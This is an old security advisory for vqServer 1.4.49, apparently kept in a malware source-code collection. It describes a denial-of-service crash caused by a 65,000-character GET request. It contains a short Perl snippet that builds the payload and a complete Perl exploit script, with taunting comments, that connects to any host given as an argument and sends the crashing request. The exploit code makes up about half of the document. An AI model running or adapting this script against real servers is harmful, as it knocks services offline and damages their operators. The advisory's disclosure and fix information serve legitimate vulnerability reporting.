MalwareSourceCode/Perl/DoS.Perl.Vqserver
2020-10-09 21:59:39 -05:00

71 lines
2.2 KiB
Plaintext

DHC Advisory
Advisory for vqServer 1.4.49
vqServer is made by vqSoft. Site: http://www.vqsoft.com
by nemesystm of the DHC
(http://dhcorp.cjb.net - auto45040@hushmail.com)
/-|=[explaination]=|-\
When sending vqServer version 1.4.49 a malformed URL request it will crash
the service. This has been verified to work on the Windows version, but
it probably is in the linux/unix version and prior versions too.
/-|=[testing it]=|-\
To test this vulnerability, send a GET request with 65000 characters.
So:
GET /AAA (hit return =)
Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste
that much characters in their browser fields (www.server.com/AAA) you will
have to use something like Telnet.
You can easily program something to print 65000 chars in Perl:
open (OUT, ">$ARGV[0]");
print OUT ("GET /");
print OUT ("A" x 65000);
then it's just a cut and paste.
Or you can use the example code below
/-|=[fix]=|-\
the latest edition of vqServer (1.9.47) is unaffected by this. It is available
for download at www.vqsoft.com
/-|=[notes]=|-\
PUT, POST and the Administration port do not seem to be affected by a high
amount of characters. The Windows version needed a reinstall every five
or so crashes. A reboot or total shutdown did not help.
/-|=[exploit code]=|-\
sinfony quickly wrote some code so you can see if you're vulnerable.
# DoS exploit for vqServer 1.4.49
# This vulnerability was discovered by nemesystm
# (auto45040@hushmail.com)
#
# code by: sinfony (chinesef00d@hotmail.com)
# [confess.sins.labs] (http://www.ro0t.nu/csl)
# and DHC member
#
# kiddie quote of the year:
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it
die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
usage: $0 <host> \n"
if $#ARGV != 0;
use IO::Socket;
$host = $ARGV[0];
$port = 80;
print "Connecting to $host on port $port...\n";
$suck = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "$host isnt a webserver you schmuck.\n";
$a = A;
$send = $a x 65000;
print "Connected, sending exploit.\n";
print $suck "GET /$send\n";
sleep(3);
print "Exploit sent. vqServer should be dead.\n";
close($suck)